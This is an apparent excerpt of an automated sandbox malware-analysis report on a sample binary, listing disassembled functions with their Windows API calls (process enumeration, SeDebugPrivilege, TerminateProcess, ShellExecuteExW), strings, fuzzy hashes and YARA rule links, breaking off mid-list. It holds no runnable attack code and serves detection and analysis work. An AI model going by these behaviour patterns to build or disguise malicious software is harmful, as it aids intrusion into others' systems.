                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: b751c7010ca4d5be1b414e3078fe1809c26ce68a90fa2fe721f053ebf15a86aa
                                                    • Instruction ID: c0ac6240ffa685d5b8217831d365010e8aa607c02c426de195d67c3b7895c94a
                                                    • Opcode Fuzzy Hash: b751c7010ca4d5be1b414e3078fe1809c26ce68a90fa2fe721f053ebf15a86aa
                                                    • Instruction Fuzzy Hash: 1201BBB5240348FFE710ABA5DC8DF6B3BADEB89711F015521FA05DB1A1CA749810CB20
                                                    Function 00679A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?,?,0065799D), ref: 0065766F
                                                      • Part of subcall function 00657652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 0065768A
                                                      • Part of subcall function 00657652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 00657698
                                                      • Part of subcall function 00657652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?), ref: 006576A8
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00679B1B
                                                    • _memset.LIBCMT ref: 00679B28
                                                    • _memset.LIBCMT ref: 00679C6B
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00679C97
                                                    • CoTaskMemFree.OLE32(?), ref: 00679CA2
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 00679CF0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: be82b5151465eda5cf5074b7a8a2e8d3a703f83d8fba28e8f40318bf1aa03070
                                                    • Instruction ID: 01f070df0efe3af761d41c9116d418dc8406814c7c5222210b070a9ae80741c3
                                                    • Opcode Fuzzy Hash: be82b5151465eda5cf5074b7a8a2e8d3a703f83d8fba28e8f40318bf1aa03070
                                                    • Instruction Fuzzy Hash: 67912A71D00229EBDF14DFA4DC81EDEBBBAAF08710F208159F519A7281DB715A45CFA0
                                                    Function 00686FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00687093
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 006870A7
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006870C1
                                                    • _wcscat.LIBCMT ref: 0068711C
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00687133
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00687161
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 1b312ed5b59ff0d4e8e30e33eace1a913d40a4b88fa80297e95338220b10755e
                                                    • Instruction ID: 4d43fdbce255914dd059ac76a6097eeaadec218d86a9b9696ad9f5cf5cc4be64
                                                    • Opcode Fuzzy Hash: 1b312ed5b59ff0d4e8e30e33eace1a913d40a4b88fa80297e95338220b10755e
                                                    • Instruction Fuzzy Hash: F141A471944308AFDB21EF64CC85BEE77AAEF08354F20062AF584E7291D771DD848B64
                                                    Function 0067EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00663E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00663EB6
                                                      • Part of subcall function 00663E91: Process32FirstW.KERNEL32(00000000,?), ref: 00663EC4
                                                      • Part of subcall function 00663E91: CloseHandle.KERNEL32(00000000), ref: 00663F8E
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067ECB8
                                                    • GetLastError.KERNEL32 ref: 0067ECCB
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067ECFA
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0067ED77
                                                    • GetLastError.KERNEL32(00000000), ref: 0067ED82
                                                    • CloseHandle.KERNEL32(00000000), ref: 0067EDB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: 66f3f8d0121ae5dea72eccdfffb2f4ad2894bce4131eb9625145fdfb9a64c90b
                                                    • Instruction ID: 3c2a6377c41d2d018b6d37cebd77d314061c92cd5bec487a4ab96acc0093342a
                                                    • Opcode Fuzzy Hash: 66f3f8d0121ae5dea72eccdfffb2f4ad2894bce4131eb9625145fdfb9a64c90b
                                                    • Instruction Fuzzy Hash: 4D418E712002019FDB24EF24CC95FAEB7A7AF44714F18845DF8469B3D2DBB5A809CB99
                                                    Function 00663226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 006632C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 60f8e5a70a1a101048050dd72b0d9a338e957bfa3fc926342779822ac351850e
                                                    • Instruction ID: 83428045b8f71d822f8c579c1141d5b75a3f81cd22ec4e2be975ceba2c3e5d50
                                                    • Opcode Fuzzy Hash: 60f8e5a70a1a101048050dd72b0d9a338e957bfa3fc926342779822ac351850e
                                                    • Instruction Fuzzy Hash: 0B11EB312087B67BA7015B55EC62CEAB3AEDF19370F20002AF50056381D7765B414AA5
                                                    Function 00664534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0066454E
                                                    • LoadStringW.USER32(00000000), ref: 00664555
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0066456B
                                                    • LoadStringW.USER32(00000000), ref: 00664572
                                                    • _wprintf.LIBCMT ref: 00664598
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006645B6
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00664593
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 569b4b73b5b213c66928aec453d54e1288d804f09d8306bca923603c7262740e
                                                    • Instruction ID: 0399a7de5ad4b1c45eb42cf9764de55e147b5fcc3ff74289f71b7806feeff898
                                                    • Opcode Fuzzy Hash: 569b4b73b5b213c66928aec453d54e1288d804f09d8306bca923603c7262740e
                                                    • Instruction Fuzzy Hash: C10162F2900208BFE750ABA0DD89EE7776DEB08301F0006A5BB46E2151EA749EC58B74
                                                    Function 0068D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • GetSystemMetrics.USER32(0000000F), ref: 0068D78A
                                                    • GetSystemMetrics.USER32(0000000F), ref: 0068D7AA
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0068D9E5
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0068DA03
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0068DA24
                                                    • ShowWindow.USER32(00000003,00000000), ref: 0068DA43
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0068DA68
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0068DA8B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: 9b494c4b3a408cec1cf46676a66b660dd0fec697563c92098b897910c6e4aa3f
                                                    • Instruction ID: 7087c8bf241eb22d5c8933dcbe41a466ce4172d22c6286fa2239397466f6f29b
                                                    • Opcode Fuzzy Hash: 9b494c4b3a408cec1cf46676a66b660dd0fec697563c92098b897910c6e4aa3f
                                                    • Instruction Fuzzy Hash: D6B17971600215EBDF18DF68C9857FD7BB2BF44701F188269EC48AB295DB34A990CB60
                                                    Function 00602A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000), ref: 00602ACF
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000,000000FF), ref: 00602B17
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000), ref: 0063C46A
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C417,00000004,00000000,00000000,00000000), ref: 0063C4D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: f094821e9f963b0879c1b676273847d0bd8224d069820aac2a0f26a29a922142
                                                    • Instruction ID: 1caad5de953756771d75f3cc45443f20539fa1a7db68a354f01f431185a5279d
                                                    • Opcode Fuzzy Hash: f094821e9f963b0879c1b676273847d0bd8224d069820aac2a0f26a29a922142
                                                    • Instruction Fuzzy Hash: B2413C30344681AACB3D8B28DCBCBBB7BD3AF45314F18891DF047966E1DA359882D760
                                                    Function 00667368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0066737F
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006673B6
                                                    • EnterCriticalSection.KERNEL32(?), ref: 006673D2
                                                    • _memmove.LIBCMT ref: 00667420
                                                    • _memmove.LIBCMT ref: 0066743D
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0066744C
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00667461
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00667480
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: bfd9581a94fafc048b4352bbd0a6f2ae1194c40ee2cbe6ad765f9063a316a8f2
                                                    • Instruction ID: bd10f3f1a78245a8a9db2b52f7c57b160adc620c99b8c582bf4cce246812a977
                                                    • Opcode Fuzzy Hash: bfd9581a94fafc048b4352bbd0a6f2ae1194c40ee2cbe6ad765f9063a316a8f2
                                                    • Instruction Fuzzy Hash: B031CF31904215EBCF10DFA4DC89AAEBBBAEF45710F1441A9FD04AB246DB309A50CBA4
                                                    Function 00686442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 0068645A
                                                    • GetDC.USER32(00000000), ref: 00686462
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0068646D
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00686479
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006864B5
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006864C6
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00689299,?,?,000000FF,00000000,?,000000FF,?), ref: 00686500
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00686520
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 2f2338b5e85c789627c22dc2211619eacbad36bf8884dba43693a2bd144dc871
                                                    • Instruction ID: ac449edfbdc60dc606f23b2f1e417971952b6133d892293336eb18ecc28152c8
                                                    • Opcode Fuzzy Hash: 2f2338b5e85c789627c22dc2211619eacbad36bf8884dba43693a2bd144dc871
                                                    • Instruction Fuzzy Hash: 41319C72200214BFEB109F10CC8AFEA3FAAEF09765F045265FE089A291D6B59C41CB75
                                                    Function 0065C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: e803e3b9b9282c613c069d8a6ace3d9b0659f0cb26a5a9f8df9aa7c6c1b83427
                                                    • Instruction ID: 4c1a250d713b63844daebfcf1b63fb0fb1d8985319c7a5303e622f399d176512
                                                    • Opcode Fuzzy Hash: e803e3b9b9282c613c069d8a6ace3d9b0659f0cb26a5a9f8df9aa7c6c1b83427
                                                    • Instruction Fuzzy Hash: C4210A71604B16BFDA60A6209C56FFF239F9F213B6F040014FD059ABC2E712DD1985A5
                                                    Function 0066ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                    • _wcstok.LIBCMT ref: 0066EEFF
                                                    • _wcscpy.LIBCMT ref: 0066EF8E
                                                    • _memset.LIBCMT ref: 0066EFC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    • Opcode ID: 9061a757aa6b6443b36da6553b71e478ecadfaebf17836849675156d7c2cd2dd
                                                    • Instruction ID: b533993a9814bf36d594651d72814c98f70f744fa1edad2215f99f0764083981
                                                    • Opcode Fuzzy Hash: 9061a757aa6b6443b36da6553b71e478ecadfaebf17836849675156d7c2cd2dd
                                                    • Instruction Fuzzy Hash: B9C191755483009FC768EF24D881A9BB7E6FF85310F04492DF8998B2A2DB30ED45CB96
                                                    Function 00601424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 822c743c3342bc459269f6305d821b4440673c290b7f7f255f69dcbb5ca0b767
                                                    • Instruction ID: 5fbd7ff7b3bd474f7656fc2fa5a324253949f200e5455673c3d17a9a5758d7e1
                                                    • Opcode Fuzzy Hash: 822c743c3342bc459269f6305d821b4440673c290b7f7f255f69dcbb5ca0b767
                                                    • Instruction Fuzzy Hash: 1F715070940109EFCB09DF54CC85AFFBBB6FF86314F148159F915AA291C7349A51CBA4
                                                    Function 00676E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08be14bcbf035a5a0cc6b8435d24410e9bd0851d64b214381cb20e41570e6000
                                                    • Instruction ID: 6b04fa3617eacdb30090e14ec09f59d090cbd9bfe3edaf95ea724885a1dae8a7
                                                    • Opcode Fuzzy Hash: 08be14bcbf035a5a0cc6b8435d24410e9bd0851d64b214381cb20e41570e6000
                                                    • Instruction Fuzzy Hash: 2561DE71508300ABD754EB24CC85E6BB7EBAF84714F108A1CF54A972E2DB70AD05CBA6
                                                    Function 0068B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(01315678), ref: 0068B6A5
                                                    • IsWindowEnabled.USER32(01315678), ref: 0068B6B1
                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0068B795
                                                    • SendMessageW.USER32(01315678,000000B0,?,?), ref: 0068B7CC
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0068B809
                                                    • GetWindowLongW.USER32(01315678,000000EC), ref: 0068B82B
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0068B843
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: a4141f3f2d42a8838e3c8d7bc9906bac5965394ee77c973dfce7bb75f73e7fa8
                                                    • Instruction ID: c372ca8bf326b6fc4aa53fd4d05fb3cb897284ed85e394f5a6a5beb9a1398c8b
                                                    • Opcode Fuzzy Hash: a4141f3f2d42a8838e3c8d7bc9906bac5965394ee77c973dfce7bb75f73e7fa8
                                                    • Instruction Fuzzy Hash: D3718E34640304AFDB24AF64C894FFA7BBBEF89300F146669F94697361D731A881CB54
                                                    Function 0067F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0067F75C
                                                    • _memset.LIBCMT ref: 0067F825
                                                    • ShellExecuteExW.SHELL32(?), ref: 0067F86A
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
